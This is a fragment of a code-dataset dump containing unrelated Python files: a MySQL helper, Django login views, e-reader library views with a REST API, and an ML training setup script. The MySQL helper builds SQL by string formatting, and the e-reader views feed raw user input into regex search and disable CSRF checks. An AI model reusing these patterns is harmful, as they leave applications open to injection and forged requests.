conf[\"is_test\"]:\n\t\t\tcondb = conf[\"mysql\"][\"test_db\"]\n\t\telse:\n\t\t\tcondb = conf[\"mysql\"][\"db\"]\n\t\tsql = \"\"\"SELECT count(*) \nFROM information_schema.TABLES \nWHERE (TABLE_SCHEMA = '%s') AND (TABLE_NAME = '%s');\n\"\"\" % (condb, tableName)\n\t\t(cnt,) = self.select1rec(sql)\n\t\tif cnt > 0:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\n\tdef dropTable(self, tableName):\n\t\tself.execSql(\"drop table if exists %s;\" % tableName)\n\n\tdef select1rec(self, sql):\n\t\tcur = self.execSql(sql)\n\t\trow = cur.fetchone()\n\t\tcur.close()\n\t\tif row:\n\t\t\treturn row\n\t\treturn None\n\n\tdef select1value(self, tableName, field, whereList):\n\t\tstrwhere = \"\"\n\t\tstrwhere = \"where %s\" % (\" and \".join(whereList))\n\t\tsql = \"select %s as cnt from %s %s\" % (field, tableName, strwhere)\n\t\trow = self.select1rec(sql)\n\t\tif row:\n\t\t\t(val,) = row\n\t\t\treturn val\n\t\treturn None\n\ndef execSql(sql):\n\treturn MySqlDB().execSql(sql)","repo_name":"toku463ne/stockAnalyzer","sub_path":"db/mysql.py","file_name":"mysql.py","file_ext":"py","file_size_in_byte":2804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} 
+{"seq_id":"70803462011","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.models import User\nfrom django.contrib import auth, messages\nfrom apps.atendimento.models import AtendimentoPretoVelho\nfrom apps.usuario.models import Consulente\nfrom .forms import LoginForm, CadastroForm\n\ndef cadastro(request):\n form = CadastroForm\n if request.method == 'POST':\n form = CadastroForm(request.POST)\n if form.is_valid():\n nome = form.cleaned_data['nome']\n email = form.cleaned_data['email']\n senha = form.cleaned_data['senha']\n user = User.objects.create_user(username=nome, email=email, password=senha)\n user.save()\n consulente = Consulente.objects.filter(email=email).first()\n if consulente:\n consulente.usuario = user\n consulente.save()\n return redirect('login')\n \n context = { 'form': form }\n return render(request,'usuario/cadastro.html', context)\n\ndef login(request):\n form = LoginForm\n if request.method == 'POST':\n form = LoginForm(request.POST)\n if form.is_valid():\n email = form.cleaned_data['email']\n senha = form.cleaned_data['senha']\n nome = User.objects.filter(email=email).values_list('username', flat=True).get()\n user = auth.authenticate(request, username=nome, password=senha)\n if user is not None:\n auth.login(request, user)\n return redirect('dashboard')\n else:\n messages.error(request,'Senha incorreta.')\n \n context = {'form': form}\n return render(request, 'usuario/login.html', context)\n\ndef logout(request):\n auth.logout(request)\n return redirect('dashboard')\n\ndef dashboard(request):\n if request.user.is_authenticated:\n consulente = Consulente.objects.filter(usuario=request.user).first()\n atendimentos = AtendimentoPretoVelho.objects.filter(consulente=consulente)\n\n context = { \n 'atendimentos': atendimentos\n }\n return render(request, 'usuario/dashboard.html', context)\n else:\n return redirect('login')\n\n\ndef campo_vazio(campo):\n return not campo.strip()\n\ndef senhas_nao_sao_iguais(senha, senha2):\n return senha != senha2","repo_name":"tyagonunes/ohana","sub_path":"apps/usuario/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"756704360","text":"from django.contrib.auth.models import User, Group\nfrom django.shortcuts import render\nfrom django.views import generic\nfrom reader.models import BooksIssued, Note, Highlight, BookMark, Book\nfrom reader.serializers import UserSerializer\nfrom django.utils import timezone\nfrom django.core.urlresolvers import reverse\nfrom django.http import HttpResponseRedirect,HttpResponse, HttpResponseNotFound\nfrom login.models import ExtendedUser\nimport sys, os, re\nimport simplejson as json\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.renderers import JSONRenderer\nfrom rest_framework.parsers import JSONParser\nfrom reader.serializers import UserSerializer, BooksIssuedSerializer, BookSerializer\nfrom rest_framework.permissions import IsAuthenticated, AllowAny\nfrom rest_framework.authentication import TokenAuthentication, BasicAuthentication\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework.decorators import api_view, authentication_classes, permission_classes\nfrom rest_framework import status\nfrom rest_framework import generics\n\n# Create your views here.\n\nclass MyProfile(generic.ListView):\n\tcontext_object_name = 'data'\n\n\tdef 
get_template_names(self):\n\t\trequest = self.request\n\t\ttemplate_name = 'profile.html'\n\t\treturn [template_name]\n\n\tdef get_queryset(self, **kwargs):\n\t\trequest = self.request\n\t\tuser = request.user\n\t\tcontext = {}\n\t\tissuedBooks = []\n\t\tuserIssuedBooks = BooksIssued.objects.filter(user=user)\n\t\tfor booking in userIssuedBooks:\n\t\t\tbook = Book.objects.get(id=booking.book_id)\n\t\t\tissuedBooks.append(book)\n\t\tcontext['issuedBooks'] = issuedBooks\n\t\treturn context\n\nclass MyLibrary(generic.ListView):\n\tcontext_object_name = 'data'\n\n\tdef get_template_names(self):\n\t\trequest = self.request\n\t\ttemplate_name = 'my_library.html'\n\t\treturn [template_name]\n\n\tdef get_queryset(self, **kwargs):\n\t\trequest = self.request\n\t\tuser = request.user\n\t\tif hasattr(request.user,'extendeduser'):\n\t\t\tpass\n\t\telif user.socialaccount_set.all():\n\t\t\tsocial_set = user.socialaccount_set.all()[0]\n\t\t\tif not (ExtendedUser.objects.filter(user_id = user.id)):\n\t\t\t\tif social_set.provider == 'facebook':\n\t\t\t\t\tfacebook_data = social_set.extra_data\n\t\t\t\t\tprint('****************************')\n\t\t\t\t\tprint(facebook_data)\n\t\t\t\t\tprint('****************************')\n\t\t\t\t\timg_url = \"https://graph.facebook.com/{}/picture?width=140&&height=140\".format(facebook_data.get('id',''))\n\t\t\t\t\textendedUser = ExtendedUser(user=user, imageUrl = img_url)\n\t\t\t\t\textendedUser.save()\n\t\tcontext = {}\n\t\tissuedBooks = []\n\t\tuserIssuedBooks = BooksIssued.objects.filter(user=user)\n\t\tfor booking in userIssuedBooks:\n\t\t\tbook = Book.objects.get(id=booking.book_id)\n\t\t\tissuedBooks.append(book)\n\t\tcontext['issuedBooks'] = issuedBooks\n\t\treturn context\n\n# Create your views here.\nclass CentralLibrary(generic.ListView):\n\tcontext_object_name = 'data'\n\n\tdef get_template_names(self):\n\t\trequest = self.request\n\t\ttemplate_name = 'central_library.html'\n\t\treturn [template_name]\n\n\tdef get_queryset(self, **kwargs):\n\t\trequest = self.request\n\t\tuser = request.user\n\t\tcontext = {}\n\t\tissuedBooks = []\n\t\tbookList = Book.objects.all()\n\t\tcontext['books'] = [book for book in bookList]\n\t\treturn context\n\nclass IssueBookView(generic.ListView):\n\ttemplate_name = 'central_library.html'\n\tdef get_queryset(self):\n\t\tcontext = {}\n\t\treturn context\n\n\tdef post(self,request,*args,**kwargs):\n\t\ttry:\n\t\t\tmessage = {}\n\t\t\trequest = self.request\n\t\t\tuser = request.user\n\t\t\talreadyIssuedBooksCount = BooksIssued.objects.filter(user=user).count()\n\t\t\tif(alreadyIssuedBooksCount == 3):\n\t\t\t\tmessage['success'] = 'You already have 3 books issued. 
First return a book from MyLibrary to continue'\n\t\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\n\t\t\tbookId = int(request.POST.get('bookId',''))\n\t\t\tbookToIssue = Book.objects.get(pk=bookId)\n\n\t\t\tif bookToIssue:\n\t\t\t\tissuedBooks, created = BooksIssued.objects.get_or_create(user=user, book=bookToIssue)\n\t\t\telse:\n\t\t\t\tmessage['success'] = 'Error occured while issuing book'\n\t\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\n\t\t\tif created:\n\t\t\t\tmessage['success'] = 'Book is successfully issued'\n\t\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\t\t\telse:\n\t\t\t\tmessage['success'] = 'This book is already issued to you.'\n\t\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\t\texcept:\n\t\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\t\tprint(' Exception occured in function %s() at line number %d of %s,\\n%s:%s ' % (exc_tb.tb_frame.f_code.co_name, exc_tb.tb_lineno, __file__, exc_type.__name__, exc_obj))\n\t\t\tmessage['success'] = 'Some error occured'\n\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\nclass ReturnBookView(generic.ListView):\n\ttemplate_name = 'my_library.html'\n\tdef get_queryset(self):\n\t\tcontext = {}\n\t\treturn context\n\n\tdef post(self,request,*args,**kwargs):\n\t\ttry:\n\t\t\tmessage = {}\n\t\t\trequest = self.request\n\t\t\tuser = request.user\n\t\t\tbookId = int(request.POST.get('bookId',''))\n\t\t\tissuedBook = BooksIssued.objects.filter(user=user, book=bookId)\n\n\t\t\tif issuedBook:\n\t\t\t\tissuedBook.delete();\n\t\t\t\tmessage['success'] = 'Book returned successfully'\n\t\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\t\t\telse:\n\t\t\t\tmessage['success'] = 'Error in returning book'\n\t\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\t\texcept:\n\t\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\t\tprint(' Exception occured in function %s() at line number %d of %s,\\n%s:%s ' % (exc_tb.tb_frame.f_code.co_name, exc_tb.tb_lineno, __file__, exc_type.__name__, exc_obj))\n\t\t\tmessage['success'] = 'Some error occured'\n\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\ndef getbook(request):\n\tmessage = {}\n\ttry:\n\t\tbookId = int(request.POST.get('bookId',''))\n\t\tif bookId:\n\t\t\tbookToRead = Book.objects.get(pk=bookId)\n\t\t\tbookUrl = str(bookToRead.bookEpub)\n\t\t\tbookUrl = '/media/books/'+bookUrl.split('/')[-1]\n\t\t\tmessage['bookUrl'] = bookUrl\n\t\t\tmessage['bookName'] = str(bookToRead.bookName)\n\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\t\telse:\n\t\t\tmessage['error'] = 'Error retrieving book info.'\n\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\texcept:\n\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\tprint(' Exception occured in function %s() at line number %d of %s,\\n%s:%s ' % (exc_tb.tb_frame.f_code.co_name, exc_tb.tb_lineno, __file__, exc_type.__name__, exc_obj))\n\t\tmessage['message'] = 'Some error occured'\n\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\ndef getbookmarks(request):\n\tmessage = {}\n\tbookMarks = []\n\ttry:\n\t\tuser = request.user\n\t\tbookId = int(request.POST.get('bookId',''))\n\t\tif bookId and user:\n\t\t\tbook = Book.objects.get(pk=bookId)\n\t\t\tuserBookmarks = BookMark.objects.filter(user=user, 
book=book)\n\t\t\tfor bookmark in userBookmarks:\n\t\t\t\tbookMarks.append({'bookMarkName':bookmark.bookmarkName, 'chapterHref':bookmark.chapterHref, 'pageCfi':bookmark.pageCfi})\n\t\t\tmessage['bookmarkList'] = bookMarks\n\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\t\telse:\n\t\t\tmessage['error'] = 'Error in retrieving Bookmarks.'\n\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\texcept:\n\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\tprint(' Exception occured in function %s() at line number %d of %s,\\n%s:%s ' % (exc_tb.tb_frame.f_code.co_name, exc_tb.tb_lineno, __file__, exc_type.__name__, exc_obj))\n\t\tmessage['message'] = 'Some error occured'\n\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\ndef getNotes(request):\n\tmessage = {}\n\tnotes = []\n\ttry:\n\t\tuser = request.user\n\t\tbookId = int(request.POST.get('bookId',''))\n\t\tif bookId and user:\n\t\t\tbook = Book.objects.get(pk=bookId)\n\t\t\tuserNotes = Note.objects.filter(user=user, book=book)\n\t\t\tfor note in userNotes:\n\t\t\t\tnotes.append({'noteText':note.text, 'chapterHref':note.chapterHref, 'pageCfi':note.pageCfi, 'wordRange':note.wordRange})\n\t\t\tmessage['noteList'] = notes\n\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\t\telse:\n\t\t\tmessage['error'] = 'Error in retrieving Notes.'\n\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\texcept:\n\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\tprint(' Exception occured in function %s() at line number %d of %s,\\n%s:%s ' % (exc_tb.tb_frame.f_code.co_name, exc_tb.tb_lineno, __file__, exc_type.__name__, exc_obj))\n\t\tmessage['message'] = 'Some error occured'\n\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\ndef getHighlights(request):\n\tmessage = {}\n\thighlights = []\n\ttry:\n\t\tuser = request.user\n\t\tbookId = int(request.POST.get('bookId',''))\n\t\tif bookId and user:\n\t\t\tbook = Book.objects.get(pk=bookId)\n\t\t\tuserHighlights = Highlight.objects.filter(user=user, book=book)\n\t\t\tfor highlight in userHighlights:\n\t\t\t\thighlights.append({'highlightText':highlight.text, 'chapterHref':highlight.chapterHref, 'pageCfi':highlight.pageCfi, 'wordRange':highlight.wordRange})\n\t\t\tmessage['highlightList'] = highlights\n\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\t\telse:\n\t\t\tmessage['error'] = 'Error in retrieving Highlights.'\n\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\texcept:\n\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\tprint(' Exception occured in function %s() at line number %d of %s,\\n%s:%s ' % (exc_tb.tb_frame.f_code.co_name, exc_tb.tb_lineno, __file__, exc_type.__name__, exc_obj))\n\t\tmessage['message'] = 'Some error occured'\n\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\ndef saveNotes(request):\n\tmessage = {}\n\ttry:\n\t\tuser = request.user\n\t\tbookId = int(request.POST.get('bookId',''))\n\t\twordRange = request.POST.get('wordRange','')\n\t\tpageCfi = request.POST.get('pageCfi','')\n\t\tchapterHref = request.POST.get('chapterHref','')\n\t\tnoteText = request.POST.get('noteText','')\n\t\tbook = Book.objects.get(pk=bookId)\n\n\t\tif book and wordRange and pageCfi and chapterHref and noteText:\n\t\t\tnewNote = Note(user=user, book=book, text=noteText, wordRange=wordRange, chapterHref=chapterHref, 
pageCfi=pageCfi)\n\t\t\tnewNote.save()\n\t\t\tmessage['message'] = 'Notes saved successfully.'\n\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\t\telse:\n\t\t\tmessage['message'] = 'Error occured while saving Note.'\n\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\texcept:\n\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\tprint(' Exception occured in function %s() at line number %d of %s,\\n%s:%s ' % (exc_tb.tb_frame.f_code.co_name, exc_tb.tb_lineno, __file__, exc_type.__name__, exc_obj))\n\t\tmessage['message'] = 'Some error occured'\n\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\ndef saveBookmark(request):\n\tmessage = {}\n\ttry:\n\t\tuser = request.user\n\t\tbookmarkName = request.POST.get('bookmarkName','')\n\t\tbookId = int(request.POST.get('bookId',''))\n\t\tpageCfi = request.POST.get('pageCfi','')\n\t\tchapterHref = request.POST.get('chapterHref','')\n\t\tbook = Book.objects.get(pk=bookId)\n\n\t\tif book and pageCfi and chapterHref and bookmarkName:\n\t\t\tnewBookmark = BookMark(user=user, book=book, bookmarkName=bookmarkName, chapterHref=chapterHref, pageCfi=pageCfi)\n\t\t\tnewBookmark.save()\n\t\t\tmessage['message'] = 'Bookmark saved successfully'\n\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\t\telse:\n\t\t\tmessage['message'] = 'Error occured while saving Bookmark.'\n\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\texcept:\n\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\tprint(' Exception occured in function %s() at line number %d of %s,\\n%s:%s ' % (exc_tb.tb_frame.f_code.co_name, exc_tb.tb_lineno, __file__, exc_type.__name__, exc_obj))\n\t\tmessage['message'] = 'Some error occured'\n\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\ndef saveHighlights(request):\n\tmessage = {}\n\ttry:\n\t\tuser = request.user\n\t\tbookId = int(request.POST.get('bookId',''))\n\t\twordRange = request.POST.get('wordRange','')\n\t\tpageCfi = request.POST.get('pageCfi','')\n\t\tchapterHref = request.POST.get('chapterHref','')\n\t\ttext = request.POST.get('text','')\n\t\tbook = Book.objects.get(pk=bookId)\n\n\t\tif book and pageCfi and chapterHref and text and wordRange:\n\t\t\tnewHighlight = Highlight(user=user, book=book, wordRange=wordRange, text=text, chapterHref=chapterHref, pageCfi=pageCfi)\n\t\t\tnewHighlight.save()\n\t\t\tmessage['message'] = 'Highlight saved successfully'\n\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\t\telse:\n\t\t\tmessage['message'] = 'Error occured while saving Highlight'\n\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\texcept:\n\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\tprint(' Exception occured in function %s() at line number %d of %s,\\n%s:%s ' % (exc_tb.tb_frame.f_code.co_name, exc_tb.tb_lineno, __file__, exc_type.__name__, exc_obj))\n\t\tmessage['message'] = 'Some error occured'\n\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\ndef editProfile(request):\n\tmessage = {}\n\ttry:\n\t\tuser = request.user\n\t\tfieldToEdit = request.POST.get('field','')\n\t\tnewValue = request.POST.get('value')\n\n\t\tif fieldToEdit == 'first_name':\n\t\t\tuser.first_name = newValue\n\t\telif fieldToEdit == 'last_name':\n\t\t\tuser.last_name = newValue\n\t\telif fieldToEdit == 'address':\n\t\t\tuser.extendeduser.address = newValue\n\t\telif fieldToEdit == 
'city':\n\t\t\tuser.extendeduser.city = newValue\n\t\telif fieldToEdit == 'country':\n\t\t\tuser.extendeduser.country = newValue\n\t\telse:\n\t\t\tmessage['message'] = fieldToEdit+' is not editable.'\n\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\t\tuser.extendeduser.save()\n\t\tuser.save()\n\t\tmessage['message'] = 'Profile updated'\n\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\texcept:\n\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\tprint(' Exception occured in function %s() at line number %d of %s,\\n%s:%s ' % (exc_tb.tb_frame.f_code.co_name, exc_tb.tb_lineno, __file__, exc_type.__name__, exc_obj))\n\t\tmessage['message'] = 'Some error occured'\n\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\ndef searchBook(request):\n\tbookList = []\n\tbookFound = False\n\tmessage = {}\n\tcurrBookFound = False\n\ttry:\n\t\tuser = request.user\n\t\tsearchKey = request.POST.get('searchKey','')\n\n\t\tif searchKey:\n\t\t\tallBooks = Book.objects.all()\n\t\t\tprint(allBooks)\n\t\t\tfor book in allBooks:\n\t\t\t\tif re.search(searchKey, book.bookName, re.IGNORECASE):\n\t\t\t\t\tcurrBookFound = True\n\t\t\t\t\tbookFound = True\n\t\t\t\telif re.search(searchKey, book.author, re.IGNORECASE):\n\t\t\t\t\tcurrBookFound = True\n\t\t\t\t\tbookFound = True\n\t\t\t\telif re.search(searchKey, book.isbn, re.IGNORECASE):\n\t\t\t\t\tcurrBookFound = True\n\t\t\t\t\tbookList.append(book)\n\t\t\t\t\tbookFound = True\n\n\t\t\t\tif currBookFound:\n\t\t\t\t\tcurrBookFound = False\n\t\t\t\t\ttempBook = {}\n\t\t\t\t\ttempBook['id'] = book.id\n\t\t\t\t\ttempBook['bookName'] = book.bookName\n\t\t\t\t\ttempBook['coverImageUrl'] = '/media'+str(book.coverImageUrl).split('media')[1]\n\t\t\t\t\ttempBook['author'] = book.author\n\t\t\t\t\tbookList.append(tempBook)\n\n\t\t\tif not bookFound:\n\t\t\t\tmessage['message'] = 'Book not found'\n\t\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\t\t\telse:\n\t\t\t\tmessage['bookList'] = bookList\n\t\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\t\telse:\n\t\t\tmessage['message'] = 'Provide a valid search key.'\n\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\texcept:\n\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\tprint(' Exception occured in function %s() at line number %d of %s,\\n%s:%s ' % (exc_tb.tb_frame.f_code.co_name, exc_tb.tb_lineno, __file__, exc_type.__name__, exc_obj))\n\t\tmessage['message'] = 'Some error occured'\n\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\ndef userIssuedBooks(request):\n\tuser = request.user\n\tmessage = {}\n\tissuedBookList = []\n\ttry:\n\t\tuserIssuedBooks = BooksIssued.objects.filter(user=user)\n\t\tif userIssuedBooks:\n\t\t\tfor book in userIssuedBooks:\n\t\t\t\tissuedBookList.append(book.book.id)\n\t\t\tmessage['issuedBookList'] = issuedBookList\n\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\t\telse:\n\t\t\tmessage['issuedBookList'] = []\n\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\texcept:\n\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\tprint(' Exception occured in function %s() at line number %d of %s,\\n%s:%s ' % (exc_tb.tb_frame.f_code.co_name, exc_tb.tb_lineno, __file__, exc_type.__name__, exc_obj))\n\t\tmessage['message'] = 'Some error occured'\n\t\treturn HttpResponse(json.dumps(message), 
content_type='application/json')\n\ndef checkLogin(request):\n\tuser = request.user\n\tif user is None or not user.is_authenticated or user.is_anonymous():\n\t\turl = reverse('account_login')\n\telse:\n\t\turl = reverse('reader:mylibrary', kwargs={'pk':user.id,'user_name':user.username})\n\treturn HttpResponseRedirect(url)\n\nclass JSONResponse(HttpResponse):\n \"\"\"\n An HttpResponse that renders its content into JSON.\n \"\"\"\n def __init__(self, data, **kwargs):\n content = JSONRenderer().render(data)\n kwargs['content_type'] = 'application/json'\n super(JSONResponse, self).__init__(content, **kwargs)\n\t\t\n\t\t\n\"\"\"\nREST API functions\n\"\"\"\n\nclass UserList(generics.ListCreateAPIView):\n\tqueryset = User.objects.all()\n\tserializer_class = UserSerializer\n\nclass UserDetail(generics.RetrieveUpdateDestroyAPIView):\n\tqueryset = User.objects.all()\n\tserializer_class = UserSerializer\n\t\nclass BookIssuedList(generics.ListCreateAPIView):\n\tqueryset = BooksIssued.objects.all()\n\tserializer_class = BooksIssuedSerializer\n\n\n@api_view(['GET'])\n@authentication_classes((TokenAuthentication,))\n@permission_classes((IsAuthenticated,))\t\t\n@csrf_exempt\ndef issuedBooks(request, pk, format=None):\n\tif request.method == 'GET':\n\t\tresponse_dict = {}\n\t\tissuedBooksList = BooksIssued.objects.filter(user_id=pk)\n\t\tif issuedBooksList:\n\t\t\tresponse_dict[\"user\"] = pk\n\t\t\tresponse_dict[\"books\"] = []\n\t\t\tfor books in issuedBooksList:\n\t\t\t\ttemp = {}\n\t\t\t\ttemp[\"id\"] = books.book.id\n\t\t\t\ttemp[\"author\"] = books.book.author\n\t\t\t\ttemp[\"isbn\"] = books.book.isbn\n\t\t\t\ttemp[\"bookName\"] = books.book.bookName\n\t\t\t\ttemp[\"bookEpub\"] = \"http://52.77.237.94\"+str(books.book.bookEpub).replace('/home/ubuntu/EReader_Django','')\n\t\t\t\ttemp[\"coverImageUrl\"] = \"http://52.77.237.94\"+str(books.book.coverImageUrl).replace('/home/ubuntu/EReader_Django','')\n\t\t\t\ttemp[\"pub_date\"] = books.book.pub_date.isoformat()\n\t\t\t\tresponse_dict[\"books\"].append(temp)\n\t\telse:\n\t\t\tresponse_dict[\"error\"] = \"No Books Issued by the User or Invalid User/Book Id provided\"\n\t\t\treturn JSONResponse(json.dumps(response_dict), status=400)\n\t\treturn JSONResponse(response_dict)\n\n@api_view(['POST'])\n@authentication_classes((TokenAuthentication,))\n@permission_classes((IsAuthenticated,))\t\t\n@csrf_exempt\ndef issueBook(request, user, book, format=None):\n\tif request.method == 'POST':\n\t\tresponse = {}\n\t\ttry:\n\t\t\tuser = User.objects.get(pk=user)\n\t\texcept User.DoesNotExist:\n\t\t\tresponse['error'] = 'User Id is invalid.'\n\t\t\treturn Response(json.dumps(response), status=status.HTTP_400_BAD_REQUEST)\n\t\t\n\t\ttry:\n\t\t\tbookToIssue = Book.objects.get(pk=book)\n\t\texcept Book.DoesNotExist:\n\t\t\tresponse['error'] = 'Book Id is invalid.'\n\t\t\treturn Response(json.dumps(response), status=status.HTTP_400_BAD_REQUEST)\n\t\t\n\t\tif user and bookToIssue:\n\t\t\tissuedBooks, created = BooksIssued.objects.get_or_create(user=user, book=bookToIssue)\n\t\t\tif issuedBooks:\n\t\t\t\tresponse['success'] = \"Book already issued\"\n\t\t\telse:\n\t\t\t\tresponse['success'] = \"Book Issued Successfully\"\n\t\t\treturn Response(json.dumps(response), status=status.HTTP_201_CREATED)\n\t\telse:\n\t\t\treturn Response(json.dumps(response), status=status.HTTP_400_BAD_REQUEST)\n\t\t\t\n@api_view(['DELETE'])\n@authentication_classes((TokenAuthentication,))\n@permission_classes((IsAuthenticated,))\t\t\n@csrf_exempt\ndef returnBook(request, user, book, 
format=None):\n\tif request.method == 'DELETE':\n\t\tresponse = {}\n\t\ttry:\n\t\t\tuser = User.objects.get(pk=user)\n\t\texcept User.DoesNotExist:\n\t\t\tresponse['error'] = 'User Id is invalid.'\n\t\t\treturn Response(json.dumps(response), status=status.HTTP_400_BAD_REQUEST)\n\t\t\n\t\ttry:\n\t\t\tbookToIssue = Book.objects.get(pk=book)\n\t\texcept Book.DoesNotExist:\n\t\t\tresponse['error'] = 'Book Id is invalid.'\n\t\t\treturn Response(json.dumps(response), status=status.HTTP_400_BAD_REQUEST)\n\t\t\t\n\t\tif user and bookToIssue:\n\t\t\tissuedRecord = BooksIssued.objects.get(user=user, book=bookToIssue)\n\t\t\tif issuedRecord:\n\t\t\t\tissuedRecord.delete()\n\t\t\t\tresponse['success'] = \"Book Issued Successfully\"\n\t\t\t\treturn Response(status=status.HTTP_204_NO_CONTENT)\n\t\t\telse:\n\t\t\t\tresponse['error'] = \"The mentioned book is not issued by the user\"\n\t\t\t\treturn Response(json.dumps(response), status=status.HTTP_400_BAD_REQUEST)\n\t\t\t\n\t\telse:\n\t\t\treturn Response(json.dumps(response), status=status.HTTP_400_BAD_REQUEST)\n\nclass BookList(generics.ListCreateAPIView):\n\tqueryset = Book.objects.all()\n\tserializer_class = BookSerializer\n\nclass BookDetail(generics.RetrieveUpdateDestroyAPIView):\n\tqueryset = Book.objects.all()\n\tserializer_class = BookSerializer\t\n","repo_name":"ankitgoyalgithub/EReader_Django","sub_path":"reader/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":21230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26086099445","text":"import matplotlib as matplt\nmatplt.use('Agg')\nimport os, sys\nsys.path.insert(0,os.path.abspath('..'))\nsys.path.insert(0,os.path.abspath('.'))\nsys.path.insert(0,os.path.abspath('../easyreg'))\nimport numpy as np\nimport torch\nimport random\nimport tools.module_parameters as pars\nfrom abc import ABCMeta, abstractmethod\nfrom easyreg.piplines import run_one_task\ntorch.backends.cudnn.benchmark=True\n\n\n\nclass BaseTask():\n __metaclass__ = ABCMeta\n\n def __init__(self, name):\n self.name = name\n\n @abstractmethod\n def save(self):\n pass\n\n\nclass DataTask(BaseTask):\n \"\"\"\n base module for data setting files (.json)\n \"\"\"\n\n def __init__(self, name, path='../settings/base_data_settings.json'):\n super(DataTask, self).__init__(name)\n self.data_par = pars.ParameterDict()\n self.data_par.load_JSON(path)\n\n def save(self, path='../settings/data_settings.json'):\n self.data_par.write_ext_JSON(path)\n\n\nclass ModelTask(BaseTask):\n \"\"\"\n base module for task setting files (.json)\n \"\"\"\n\n def __init__(self, name, path='../settings/base_task_settings.json'):\n super(ModelTask, self).__init__(name)\n self.task_par = pars.ParameterDict()\n self.task_par.load_JSON(path)\n\n def save(self, path='../settings/task_settings.json'):\n self.task_par.write_ext_JSON(path)\n\n\n\n\ndef init_train_env(setting_path,output_root_path, task_name, data_task_name=None):\n \"\"\"\n create train environment.\n\n :param setting_path: the path to load 'cur_task_setting.json' and 'cur_data_setting.json' (optional if the related settings are in cur_task_setting)\n :param output_root_path: the output path\n :param data_task_name: data task name i.e. lung_seg_task , oai_seg_task\n :param task_name: task name i.e. 
run_unet, run_with_ncc_loss\n :return:\n \"\"\"\n dm_json_path = os.path.join(setting_path, 'cur_data_setting.json')\n tsm_json_path = os.path.join(setting_path, 'cur_task_setting.json')\n assert os.path.isfile(tsm_json_path),\"task setting {} not exists\".format(tsm_json_path)\n dm = DataTask('task_reg',dm_json_path) if os.path.isfile(dm_json_path) else None\n tsm = ModelTask('task_reg',tsm_json_path)\n data_task_name = data_task_name if len(data_task_name) else 'custom'\n data_task_path = os.path.join(output_root_path,data_task_name)\n if dm is not None:\n dm.data_par['datapro']['dataset']['output_path'] = output_root_path\n dm.data_par['datapro']['dataset']['task_name'] = data_task_name\n tsm.task_par['tsk_set']['task_name'] = task_name\n tsm.task_par['tsk_set']['output_root_path'] = data_task_path\n return dm, tsm\n\n\n\ndef backup_settings(args):\n \"\"\"\n The settings saved in setting_folder_path/task_name/cur_data_setting.json and setting_folder_path/task_name/cur_task_setting.json\n\n :param args:\n :return: None\n \"\"\"\n setting_folder_path = args.setting_folder_path\n dm_json_path = os.path.join(setting_folder_path, 'cur_data_setting.json')\n tsm_json_path = os.path.join(setting_folder_path, 'cur_task_setting.json')\n dm = DataTask('task_reg', dm_json_path) if os.path.isfile(dm_json_path) else None\n tsm = ModelTask('task_reg', tsm_json_path)\n task_name = args.task_name_record\n 